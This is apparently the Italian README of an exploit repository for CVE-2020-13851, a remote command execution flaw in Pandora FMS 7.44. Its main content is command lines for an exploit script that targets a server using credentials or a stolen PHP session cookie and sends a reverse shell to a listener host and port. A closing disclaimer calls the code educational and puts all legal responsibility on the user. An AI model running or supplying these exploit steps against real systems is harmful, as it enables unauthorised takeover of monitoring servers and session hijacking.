
CVE-2020-13851 Pandora FMS 7.44
Pandora FMS 7.44 CVE-2020-13851 RCE consente a un utente autenticato di ottenere l'esecuzione remota di comandi tramite la funzionalità degli eventi. Può essere sfruttato con credenziali o con un cookie di sessione PHP.
python3 pandorafms_7.44.py -t http://pwnedpandora.com/ -u username -p password -lhost 127.0.0.1 -lport 1337
python3 pandorafms_7.44.py -t http://pwnedpandora.com/ -c PHPSESSID -lhost 127.0.0.1 -lport 1337
Per il menu di aiuto
python3 pandorafms_7.44.py -h
Tutto il codice fornito in questo repository è solo a scopo educativo/di ricerca. Qualsiasi azione e/o attività relativa al materiale contenuto in questo repository è di esclusiva responsabilità dell'utente. L'uso improprio del codice in questo repository può comportare accuse penali nei confronti delle persone in questione. L'autore non sarà ritenuto responsabile nel caso in cui vengano mosse accuse penali a individui che utilizzano impropriamente il codice di questo repository per infrangere la legge.